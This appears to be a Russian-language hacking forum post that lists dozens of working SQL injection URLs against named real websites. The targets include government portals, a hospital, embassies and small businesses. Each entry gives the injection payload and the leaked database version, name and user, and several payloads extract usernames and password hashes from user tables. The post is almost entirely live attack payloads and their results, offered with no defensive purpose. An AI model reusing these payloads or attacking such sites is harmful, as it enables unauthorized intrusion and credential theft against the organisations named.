SQL Инъекции

Code:

http://www.eurofm.org/news.php?id=-94+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5--

5.0.51a-community
euro_test
euro@localhost

Code:

http://www.bookjobs.com/page.php?prmID=-8+union+select+concat(user,0x20,password)+from+mysql.user--

4.1.20
aap
root@localhost

Code:

http://www.nowt2do.co.uk/review.php?id=-545+union+select+concat(version(),0x20,database(),0x20,user()),2--

5.0.90-community
nowt2do_nowt2do
nowt2do@localhost:

Code:

http://www.ligali.org/review.php?id=-31+union+select+1,2,concat(version(),0x20,database(),0x20,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

5.0.27-community-nt
ligali_org_2
ligali_org@localhost

Code:

http://www.bia2.com/music-review/review.php?id=-182+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

4.1.22-standard
soltan_review
soltan_review@localhost

Code:

http://www.eximin.net/past_news/news_template_sql.asp?newsid=58964+or+58964=(SELECT+TOP+1+cast(Name+as+nvarchar)+from+Ad)--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Safmarine ' to a column of data type int.

 

Code:

http://portal.paraiba.pb.gov.br/index.php?option=com_radio&task=exibi_descricao&id=-1+UNION+SELECT+1,2,3,concat_ws%280x3a,username,password%29,5,6,7,8+from+gov_users--

PR:7
ТИц 10

Code:

http://www.themissourigolfer.com/index.php?option=com_business&view=business&region=37&category_id=-1+UNION+SELECT+1,2,version()--

Code:

http://www.mlh.gov.bw/index.php?option=com_departments&id=-1+UNION+SELECT+1,concat_ws%280x3a,username,password%29,3,4,5,6,7,8+from+jos_users--

 

Code:

http://www.culturecrossing.net/basics_business_student.php?id=-1+union+select+1,user(),3,database(),5,version(),7,8,9,10,11,12,13,14--

User: michael@localhost
Database: cultural
Version: 5.0.90
PR6

 

Code:

http://ihl.enssib.fr/siteihl.php?page=-1+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7--

User: root@localhost
Version: 4.1.20
Database: SiteIHL

Code:

http://www.stnicholashospital.org/providers/provider_info.php?pp=-142+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--

User: stnick_cat@localhost
Version: 5.0.89-community-log
Database: stnick_catalog

Code:

http://www.film-commission-bayern.de/index.php?Sprache=DE&SeitenID=-62+/*!union*/+/*!select*/+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,8,9,10--

User: fff_location_w@localhost
Version: 5.0.32-Debian_7etch12-log
Database: fff_location

 

суперэбл

 

Code:

http://www.besale.ru/offer.php?id=-346+union+select+1,2,3,4,5,6,7,concat(database(),0x20,version(),0x20,user()),9,10,11,12,13,14,15,16,17,18,19,20--

5.1.42-log
wwwbesaleru_besale
besale_besale@localhost

Code:

http://www.ashludiekitchens.co.uk/offer.php?id=-107+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6--

5.0.89-community-log
web54-aslud
web54-aslud@localhost

Code:

http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+concat(version(),0x20,database(),0x20,user()),2,3,4--

5.0.89-community
stmary_stmarys
stmary_stmary@localhost

Code:

http://www.elnaggarzr.com/en/main.php?id=-59+union+select+concat(version(),0x20,database(),0x20,user())--

5.0.32-Debian_7etch10-log
zr
[email protected]

Code:

http://regulus2.azstarnet.com/mediaskins/main.php?id=-2220+union+select+concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

4.1.8a-log
videoskins
read@localhost

 

Code:

http://www.qsrweb.com/storefronts.php?sf_id=-1+/*!union*/+/*!select*/+concat_ws%280x20a,0x73716c696e6a,database%28%29,user%28%29,version%28%29%29--

User: qsrweb@localhost
Version: 5.0.77-log
Database: sitedb

Code:

http://www.pizzamarketplace.com/storefronts.php?sf_id=-1+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4--

User: pmc_web@localhost
Version: 5.0.77-log
Database: sitedb

Code:

http://www.aftrot.com/aftrot/index.php?pageid=-3+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,12,13,14,15,16,17,18,19,20--

User: dbaftrot@localhost
Version: 5.0.51a-24+lenny2+spu1
Database: dbaftrot

 

Code:

http://www.dixiememetier.com/php/public/carte.php?c=-1+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6--

User: [email protected]
Version: 5.0.90-log
Database: dixiemem

Code:

http://eilatfilmfest.com/film_eng.php?filmid=-67+union+select+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,8,9,10,11,12,13,14,15,16,17,18,19,20--

User: eilatfil_felini@localhost
Version: 4.1.22-standard-log
Database: eilatfil_main

Code:

http://www.gsmarin.com/batvis.php?userindex=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,12,13

User: gsmarin@localhost
Version: 4.1.22-standard
Database: gsmarin_marinesalg

 

Code:

http://www.d1.ru/website/index.php?sel=-191+and+1=2+union+all+select++aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)--

version: 5.0.82-log
user: [email protected]
database: d1ru

 

московская торгово-промышленная палата

Code:

http://www.mostpp.ru/news.php?&id=-6485+union+select+1,2,3,4,5,6,7,concat(version(),0x20,database(),0x20,user()),9,10--

 

http://82.200.160.90/kaz/projects/projectsditail.php?recordID=-6+union+select+1,2,3,4--

user() : root@localhost

version() : 5.0.45

database() : enbek


/admin (access denied!??)

 

http://kazembassy.ru/press_service/news/?newsid=-3688+UNION+SELECT+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),4,5,6--%20+



Database Version: 4.1.13
Database name: kazemb
User name: [email protected]
Os : suse-linux

 

http://www.olympic.kz/singlevideo.php?id=6941337+union+select+1,2,3,4,5,6--

version() : 4

column 3 (page title)

 

_http://www.politcom.ru/article.php?comments&id=-9155'+union+select+1,2, 3,4,ve rsion(),6,7/*

 

http://www.redbookkz.info/list.php?taxon=303+and+1=0+union+select+1,2,3,4,5,6,7,8,9

user() : redbookk_redbook@localhost

version() : 5.0.90-log

database() : redbook_redbook

columns 5,7 (title)

 

Code:

http://www.kahles.at/index.php?sprache=1&menu=-28+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12--

User: [email protected]
Version: 4.0.27inode
Database: ka000305_01

Code:

http://www.culturecrossing.net/basics_business_student.php?id=-1+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,13--

User: michael@localhost
Version: 5.0.27
Database: cultural

Code:

http://www.caucaz.com/home_de/news-rubrique.php?theme_news=-1+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12--

User: [email protected]
Version: 4.0.25-standard-log
Database: caucazcaucaz

 

еще один правительственный сайт

Code:

http://wildlife.utah.gov/hotspots/detailed.php?id=-1155149030+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

5.0.89-community
wildlife_hotspots
wildlife_wild222@localhost

 

ombudsman@localhost

 

Code:

http://handboog.net/index.php?cat=product_detail&pid=650+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29--

User: outdoor@localhost
Version: 4.1.22
Database: outdoorpro

Code:

http://www.furnitalia.com/item1.php?id=4+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--

User: [email protected]
Version: 5.0.81-log
Database: db214872500

Code:

http://www.praktijkopleiden.nl/index.php?p=2&view=artikel&id=929+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12,13--

User: [email protected]
Version: 5.0.32-Debian_7etch6-log
Database: cmsPto

 

Code:

http://www.outstretch.net/donationsstore/payments.php?cat=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7--

Username: [email protected]
Database: db311978282
Version: 5.0.81-log

Code:

http://www.montereyboats.ru/main.php?cat=8&prod=406+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11--

Username: acmotors@localhost
Database: wwwmontereyboatsru
Version: 4.1.25-log

Code:

http://www.clothingtrain.com/index.php?mod=products&cat=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6--

Username: yentablo_ct@localhost
Database: yentablo_ct
Version: 5.0.89-community

Code:

http://www.fundacioculturalmontcada.cat/index.php?aptd=3&id=46+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5--

Username: usr01db01fcm@localhost
Database: db01fcm
Version: 5.0.77

Code:

http://www.tsn.co.za/jobdetail.php?type=category&cat=4&id=405+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7--

Username: [email protected]
Database: tsn
Version: 4.1.19-community-max-nt